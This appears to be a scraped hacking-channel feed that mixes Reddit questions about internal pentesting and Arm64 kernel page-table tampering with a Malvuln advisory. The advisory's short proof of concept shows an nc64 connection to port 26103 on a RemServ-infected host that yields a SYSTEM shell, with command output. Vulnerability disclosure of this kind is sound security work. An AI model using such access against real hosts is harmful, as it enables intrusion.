Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
How to do Internal Penetration Testing? Can experienced guys here share some resources to learn from scratch?
https://www.reddit.com/r/Pentesting/comments/yv7rgu/how_to_do_internal_penetration_testing_can/

I've only done web app penetration testing in my career and have never done internal pentesting? Can you guys help me? Because I'll be asked to do them. Any course or guide that would be beneficial to me. I'm aware that Google has a plethora of guides. But I need to stick to one resource that will not confuse me and will help me do well on my first internal pentest project. Thank you in advance. submitted by /u/sword_stalin (https://www.reddit.com/user/sword_stalin)
[link] (https://www.reddit.com/r/Pentesting/comments/yv7rgu/how_to_do_internal_penetration_testing_can/) [comments] (https://www.reddit.com/r/Pentesting/comments/yv7rgu/how_to_do_internal_penetration_testing_can/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.RemServ.d MVID-2022-0655 Remote Command Execution

https://4.bp.blogspot.com/-lQ2zJgiLTsU/WWlu34sMcWI/AAAAAAAAII4/mS7xceEZnmUYAvFeoaUiLc9JINHoDjNsACLcBGAs/s1600/h102.png
Backdoor.Win32.RemServ.d malware suffers from a remote command execution vulnerability.

SHA-256 | b0430cb5e5e617e50b9038ab9865a9bd2f7b70fa286736b9fd7fbec68609f4eb

Download
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.RemServ.d
Vulnerability: Unauthenticated Remote Command Execution
Family: RemServ
Type: PE32
MD5: 05a082d441d9cf365749c0e1eb904c85
Vuln ID: MVID-2022-0655
Disclosure: 11/11/2022
Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".

Exploit/PoC:
C:\>nc64.exe x.x.x.x 26103
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

C:\>net user
net user

User accounts for \\

----------------------------------------------------------------------------
Administrator DefaultAccount Guest
Victim WDAGUtilityAccount
The command completed with one or more errors.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
VALID E-mail address payload lists of different bug classes

cross-site scripting:Continue reading on Medium »
Read more...
hacking: security in practice
How would you modify a entry in Page table ?

Hey all,

I'm working on a threat model on Kernel page table on Arm64. Do you guys have any mean to modify the translation flow of the kernel page table by updating an entry to make it point to somewhere malicious ? Considering they are marked as readonly, how would you modify it ?

Supposing you have root privilege.

submitted by /u/Bwapie
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video